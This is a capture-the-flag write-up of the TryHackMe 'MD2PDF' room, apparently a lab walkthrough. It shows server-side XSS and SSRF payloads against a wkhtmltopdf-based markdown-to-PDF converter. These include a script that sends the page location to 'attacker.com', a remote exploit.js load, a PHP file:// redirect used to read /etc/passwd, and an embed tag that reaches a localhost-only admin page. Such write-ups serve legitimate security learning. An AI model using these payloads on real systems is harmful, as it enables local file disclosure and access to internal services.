# THM - MD2PDF


## Nmap

Running nmap, seeing 2 ports open

* 80 
* 5000

The both are web pages that convert markdow to pdf

I have discovered an `/admin` page but seems to be accesible only from **locahost**

```
<title>403 Forbidden</title>
<h1>Forbidden</h1>
<p>This page can only be seen internally (localhost:5000)</p>
```

## Search for exploit

So, i search for *Markdown to PDF exploit*.

I found this Jhon Hammond's [video](https://www.youtube.com/watch?v=QVaf4DMYPFc) and this snyk's [report](https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880). I also found the hacktrick [Server Side XSS Dynamic PDF](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf)

## Test Exploit

Let's check what we can do.

First i tried basic discovery by writing something :

```
# test with Json
<script>document.write(JSON.stringify(window.location))</script>
```

Generated PDF Contain : 

```
{"origin":"file://","hash":"","href":"file:///tmp/wktemp-ad9a9521-0428-4ad7-af32-8691f4b49740.html","pathname":"/tmp/wktemp-
ad9a9521-0428-4ad7-af32-8691f4b49740.html","hostname":"","protocol":"file:","port":"","host":"","search":""}

```

So great, i know it is vulnerable to XSS ! Let's go ahead !

```
# test with iframe
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
```
But i obtain a blanc area inside the iframe :(. I decided to test another payload that will be download a script to my kali. I hoped the script will be executed by the target.

```
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.localtion);</script>
```

I started a web server on my kali machine before generated the PDF. I got a blank PDF but i saw a request was made :

```bash
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.206.186 - - [21/Mar/2023 02:04:35] "GET /?c=file:///tmp/wktemp-d9773698-51ff-458c-93d5-13e7cff25c0c.html HTTP/1.1" 200 -
```

We can confirm, that we be able to do basic blind discovery and load a resource.

I tried to go further more, but noting working... :(

I have launch an nc listener just to see the request : 

```bash
$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.8.17.62] from (UNKNOWN) [10.10.206.186] 42278
GET /exploit.js HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltopdf Safari/534.34
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en,*
Host: 10.8.17.62
```

The payload in **MD2PDF** was : `<script src="http://10.8.17.62/exploit.js"></script>`

So, i was trigger by the user-agent. What is `wkhtmltopdf` ?

I decided to do some research about this :

```
wkhtmltopdf and wkhtmltoimage are open source (LGPLv3) command line tools to render HTML into PDF and various image formats using the Qt WebKit rendering engine. These run entirely "headless" and do not require a display or display service.

There is also a C library, if you're into that kind of thing.

> https://wkhtmltopdf.org/
```

## Try to exploit wkhtmltopdf

I found, this [blog post](http://hassankhanyusufzai.com/SSRF-to-LFI/) about vulnerability in Wkhtmltopdf. This one allowing us to inject HTML in the pdf files and vulnerable to internal SSRF attack to read server’s local file.

So, i tried the first payload, i make the php script and launch a python web server to host the php code that will be called by our target :

```                               
<?php header('location:file://'.$_REQUEST['url']); ?>
```

And my python web server :

```
python3 -m http.server
```

And the i make this payload :

```
"><iframe height="2000" width="800" src=http://10.8.17.62:8000/exploit.php?x=%2fetc%2fpasswd></iframe>
```

But again, i obtained an empty pdf... I guess `iframe` is blocked. In the blog post, it mention if it's blacklist we can try other payload like :

* `embed` 
* ` object` 
* `img` 

Ok, so let's try this one : 

```
"><embed src="http://localhost:5000/admin" width=”200″ height=”200" />
```

I put `localhost:5000/admin` because early i have discovered a port 5000 but it is accessible only from localhost.

Anddddd yeah, the flag is retured :D






